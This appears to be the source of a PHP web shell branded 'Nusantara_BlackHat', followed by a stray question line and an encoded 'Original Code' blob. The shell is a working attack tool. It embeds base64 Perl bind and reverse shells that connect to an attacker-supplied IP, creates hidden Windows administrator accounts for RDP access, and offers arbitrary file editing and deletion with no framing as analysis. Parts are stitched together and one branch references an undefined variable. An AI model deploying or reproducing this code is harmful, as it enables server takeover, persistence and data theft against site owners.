    $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
    if(isset($_POST['sub_bp'])) {
        $f_bp = fopen("/tmp/bp.pl", "w");
        fwrite($f_bp, base64_decode($bind_port_p));
        fclose($f_bp);
 
        $port = $_POST['port_bind'];
        $out = exe("perl /tmp/bp.pl $port 1>/dev/null 2>&1 &");
        sleep(1);
        echo "<pre>".$out."
".exe("ps aux | grep bp.pl")."</pre>";
        unlink("/tmp/bp.pl");
    }
    $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
    if(isset($_POST['sub_bc'])) {
        $f_bc = fopen("/tmp/bc.pl", "w");
        fwrite($f_bc, base64_decode($bind_connect_p));
        fclose($f_bc);
 
        $ipbc = $_POST['ip_bc'];
        $port = $_POST['port_bc'];
        $out = exe("perl /tmp/bc.pl $ipbc $port 1>/dev/null 2>&1 &");
        sleep(1);
        echo "<pre>".$out."
".exe("ps aux | grep bc.pl")."</pre>";
        unlink("/tmp/bc.pl");
    }
} elseif($_GET['do'] == 'krdp_shell') {
    if(strtolower(substr(PHP_OS, 0, 3)) === 'win') {
        if($_POST['create']) {
            $user = htmlspecialchars($_POST['user']);
            $pass = htmlspecialchars($_POST['pass']);
            if(preg_match("/$user/", exe("net user"))) {
                echo "[INFO] -> <font color=red>user <font color=lime>$user</font> sudah ada</font>";
            } else {
                $add_user   = exe("net user $user $pass /add");
                $add_groups1 = exe("net localgroup Administrators $user /add");
                $add_groups2 = exe("net localgroup Administrator $user /add");
                $add_groups3 = exe("net localgroup Administrateur $user /add");
                echo "[ RDP ACCOUNT INFO ]<br>
                ------------------------------<br>
                IP: <font color=lime>".$ip."</font><br>
                Username: <font color=lime>$user</font><br>
                Password: <font color=lime>$pass</font><br>
                ------------------------------<br><br>
                [ STATUS ]<br>
                ------------------------------<br>
                ";
                if($add_user) {
                    echo "[add user] -> <font color='lime'>Berhasil</font><br>";
                } else {
                    echo "[add user] -> <font color='red'>Gagal</font><br>";
                }
                if($add_groups1) {
                    echo "[add localgroup Administrators] -> <font color='lime'>Berhasil</font><br>";
                } elseif($add_groups2) {
                    echo "[add localgroup Administrator] -> <font color='lime'>Berhasil</font><br>";
                } elseif($add_groups3) {
                    echo "[add localgroup Administrateur] -> <font color='lime'>Berhasil</font><br>";
                } else {
                    echo "[add localgroup] -> <font color='red'>Gagal</font><br>";
                }
                echo "------------------------------<br>";
            }
        } elseif($_POST['s_opsi']) {
            $user = htmlspecialchars($_POST['r_user']);
            if($_POST['opsi'] == '1') {
                $cek = exe("net user $user");
                echo "Checking username <font color=lime>$user</font> ....... ";
                if(preg_match("/$user/", $cek)) {
                    echo "[ <font color=lime>Sudah ada</font> ]<br>
                    ------------------------------<br><br>
                    <pre>$cek</pre>";
                } else {
                    echo "[ <font color=red>belum ada</font> ]";
                }
            } elseif($_POST['opsi'] == '2') {
                $cek = exe("net user $user nusantarablackhat");
                if(preg_match("/$user/", exe("net user"))) {
                    echo "[change password: <font color=lime>nusantarablackhat</font>] -> ";
                    if($cek) {
                        echo "<font color=lime>Berhasil</font>";
                    } else {
                        echo "<font color=red>Gagal</font>";
                    }
                } else {
                    echo "[INFO] -> <font color=red>user <font color=lime>$user</font> belum ada</font>";
                }
            } elseif($_POST['opsi'] == '3') {
                $cek = exe("net user $user /DELETE");
                if(preg_match("/$user/", exe("net user"))) {
                    echo "[remove user: <font color=lime>$user</font>] -> ";
                    if($cek) {
                        echo "<font color=lime>Berhasil</font>";
                    } else {
                        echo "<font color=red>Gagal</font>";
                    }
                } else {
                    echo "[INFO] -> <font color=red>user <font color=lime>$user</font> belum ada</font>";
                }
            } else {
                //
            }
        } else {
            echo "-- Create RDP --<br>
            <form method='post'>
            <input type='text' name='user' placeholder='username' value='nusantarablackhat' required>
            <input type='text' name='pass' placeholder='password' value='nusantarablackhat' required>
            <input type='submit' name='create' value='>>'>
            </form>
            -- Option --<br>
            <form method='post'>
            <input type='text' name='r_user' placeholder='username' required>
            <select name='opsi'>
            <option value='1'>Cek Username</option>
            <option value='2'>Ubah Password</option>
            <option value='3'>Hapus Username</option>
            </select>
            <input type='submit' name='s_opsi' value='>>'>
            </form>
            ";
        }
    } else {
        echo "<font color=red>Fitur ini hanya dapat digunakan dalam Windows Server.</font>";
    }
} elseif($_GET['act'] == 'newfile') {
    if($_POST['new_save_file']) {
        $newfile = htmlspecialchars($_POST['newfile']);
        $fopen = fopen($newfile, "a+");
        if($fopen) {
            $act = "<script>window.location='?act=edit&dir=".$dir."&file=".$_POST['newfile']."';</script>";
        } else {
            $act = "<font color=red>permission denied</font>";
        }
    }
    echo $act;
    echo "<form method='post'>
    Filename: <input type='text' name='newfile' value='$dir/newfile.php' style='width: 450px;' height='10'>
    <input type='submit' name='new_save_file' value='Submit'>
    </form>";
} elseif($_GET['act'] == 'newfolder') {
    if($_POST['new_save_folder']) {
        $new_folder = $dir.'/'.htmlspecialchars($_POST['newfolder']);
        if(!mkdir($new_folder)) {
            $act = "<font color=red>permission denied</font>";
        } else {
            $act = "<script>window.location='?dir=".$dir."';</script>";
        }
    }
    echo $act;
    echo "<form method='post'>
    Folder Name: <input type='text' name='newfolder' style='width: 450px;' height='10'>
    <input type='submit' name='new_save_folder' value='Submit'>
    </form>";
} elseif($_GET['act'] == 'rename_dir') {
    if($_POST['dir_rename']) {
        $dir_rename = rename($dir, "".dirname($dir)."/".htmlspecialchars($_POST['fol_rename'])."");
        if($dir_rename) {
            $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
        } else {
            $act = "<font color=red>permission denied</font>";
        }
    echo "".$act."<br>";
    }
    echo "<form method='post'>
    <input type='text' value='".basename($dir)."' name='fol_rename' style='width: 450px;' height='10'>
    <input type='submit' name='dir_rename' value='rename'>
    </form>";
} elseif($_GET['act'] == 'delete_dir') {
    if(is_dir($dir)) {
        if(is_writable($dir)) {
            @rmdir($dir);
            @exe("rm -rf $dir");
            @exe("rmdir /s /q $dir");
            $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
        } else {
            $act = "<font color=red>could not remove ".basename($dir)."</font>";
        }
    }
    echo $act;
} elseif($_GET['act'] == 'view') {
    echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'><b>view</b></a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
    echo "<textarea readonly>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea>";
} elseif($_GET['act'] == 'edit') {
    if($_POST['save']) {
        $save = file_put_contents($_GET['file'], $_POST['src']);
        if($save) {
            $act = "<font color=lime>Saved!</font>";
        } else {
            $act = "<font color=red>permission denied</font>";
        }
    echo "".$act."<br>";
    }
    echo "<center>Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'><b>edit</b></a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
    echo "<form method='post'>
    <textarea name='src'>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea><br>
    <center><input type='submit' value='Save' name='save' style='width: 500px;'></center>
    </form>";
} elseif($_GET['act'] == 'rename') {
    if($_POST['do_rename']) {
        $rename = rename($_GET['file'], "$dir/".htmlspecialchars($_POST['rename'])."");
        if($rename) {
            $act = "<script>window.location='?dir=".$dir."';</script>";
        } else {
            $act = "<font color=red>permission denied</font>";
        }
    echo "".$act."<br>";
    }
    echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'><b>rename</b></a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
    echo "<form method='post'>
    <input type='text' value='".basename($_GET['file'])."' name='rename' style='width: 450px;' height='10'>
    <input type='submit' name='do_rename' value='rename'>
    </form>";
} elseif($_GET['act'] == 'delete') {
    $delete = unlink($_GET['file']);
    if($delete) {
        $act = "<script>window.location='?dir=".$dir."';</script>";
    } else {
        $act = "<font color=red>permission denied</font>";
    }
    echo $act;
} else {
    if(is_dir($dir) === true) {
        if(!is_readable($dir)) {
            echo "<font color=red>can't open directory. ( not readable )</font>";
        } else {
            echo '<table width="100%" class="table_home" border="0" cellpadding="3" cellspacing="1" align="center">
            <tr>
            <th class="th_home"><center>Name</center></th>
            <th class="th_home"><center>Type</center></th>
            <th class="th_home"><center>Size</center></th>
            <th class="th_home"><center>Last Modified</center></th>
            <th class="th_home"><center>Owner/Group</center></th>
            <th class="th_home"><center>Permission</center></th>
            <th class="th_home"><center>Action</center></th>
            </tr>';
            $scandir = scandir($dir);
            foreach($scandir as $dirx) {
                $dtype = filetype("$dir/$dirx");
                $dtime = date("F d Y g:i:s", filemtime("$dir/$dirx"));
                if(function_exists('posix_getpwuid')) {
                    $downer = @posix_getpwuid(fileowner("$dir/$dirx"));
                    $downer = $downer['name'];
                } else {
                    //$downer = $uid;
                    $downer = fileowner("$dir/$dirx");
                }
                if(function_exists('posix_getgrgid')) {
                    $dgrp = @posix_getgrgid(filegroup("$dir/$dirx"));
                    $dgrp = $dgrp['name'];
                } else {
                    $dgrp = filegroup("$dir/$dirx");
                }
                if(!is_dir("$dir/$dirx")) continue;
                if($dirx === '..') {
                    $href = "<a href='?dir=".dirname($dir)."'>$dirx</a>";
                } elseif($dirx === '.') {
                    $href = "<a href='?dir=$dir'>$dirx</a>";
                } else {
                    $href = "<a href='?dir=$dir/$dirx'>$dirx</a>";
                }
                if($dirx === '.' || $dirx === '..') {
                    $act_dir = "<a href='?act=newfile&dir=$dir'>newfile</a> | <a href='?act=newfolder&dir=$dir'>newfolder</a>";
                    } else {
                    $act_dir = "<a href='?act=rename_dir&dir=$dir/$dirx'>rename</a> | <a href='?act=delete_dir&dir=$dir/$dirx'>delete</a>";
                }
                echo "<tr>";
                echo "<td class='td_home'><img src='http://icons.iconarchive.com/icons/uriy1966/steel-system/24/Games-icon.png'>$href</td>";
                echo "<td class='td_home'><center>$dtype</center></td>";
                echo "<td class='td_home'><center>-</center></th></td>";
                echo "<td class='td_home'><center>$dtime</center></td>";
                echo "<td class='td_home'><center>$downer/$dgrp</center></td>";
                echo "<td class='td_home'><center>".w("$dir/$dirx",perms("$dir/$dirx"))."</center></td>";
                echo "<td class='td_home' style='padding-left: 15px;'>$act_dir</td>";
                echo "</tr>";
            }
        }
    } else {
        echo "<font color=red>can't open directory.</font>";
    }
        foreach($scandir as $file) {
            $ftype = filetype("$dir/$file");
            $ftime = date("F d Y g:i:s", filemtime("$dir/$file"));
            $size = filesize("$dir/$file")/1024;
            $size = round($size,3);
            if(function_exists('posix_getpwuid')) {
                $fowner = @posix_getpwuid(fileowner("$dir/$file"));
                $fowner = $fowner['name'];
            } else {
                //$downer = $uid;
                $fowner = fileowner("$dir/$file");
            }
            if(function_exists('posix_getgrgid')) {
                $fgrp = @posix_getgrgid(filegroup("$dir/$file"));
                $fgrp = $fgrp['name'];
            } else {
                $fgrp = filegroup("$dir/$file");
            }
            if($size > 1024) {
                $size = round($size/1024,2). 'MB';
            } else {
                $size = $size. 'KB';
            }
            if(!is_file("$dir/$file")) continue;
            echo "<tr>";
            echo "<td class='td_home'><img src='http://icons.iconarchive.com/icons/double-j-design/origami-colored-pencil/24/green-document-cross-icon.png'><a href='?act=view&dir=$dir&file=$dir/$file'>$file</a></td>";
            echo "<td class='td_home'><center>$ftype</center></td>";
            echo "<td class='td_home'><center>$size</center></td>";
            echo "<td class='td_home'><center>$ftime</center></td>";
            echo "<td class='td_home'><center>$fowner/$fgrp</center></td>";
            echo "<td class='td_home'><center>".w("$dir/$file",perms("$dir/$file"))."</center></td>";
            echo "<td class='td_home' style='padding-left: 15px;'><a href='?act=edit&dir=$dir&file=$dir/$file'>edit</a> | <a href='?act=rename&dir=$dir&file=$dir/$file'>rename</a> | <a href='?act=delete&dir=$dir&file=$dir/$file'>delete</a> | <a href='?act=download&dir=$dir&file=$dir/$file'>download</a></td>";
            echo "</tr>";
        }
      echo "</table>";
        if(!is_readable($dir)) {
            //
        } else {
            echo "<hr>";
        }
    echo "<center>Copyright &copy; ".date("Y")." - <font color=dimgray>Nusantara_BlackHat</font></a></center>";
}
?>
</html>

Did this file decode correctly?

Original Code

<?php
session_start();
error_reporting(0);
set_time_limit(0);
$auth_pass = "f55fc9719a066603197dfe4a184d906b"; ////////pass lugiganteng

$nusantarablackhat ="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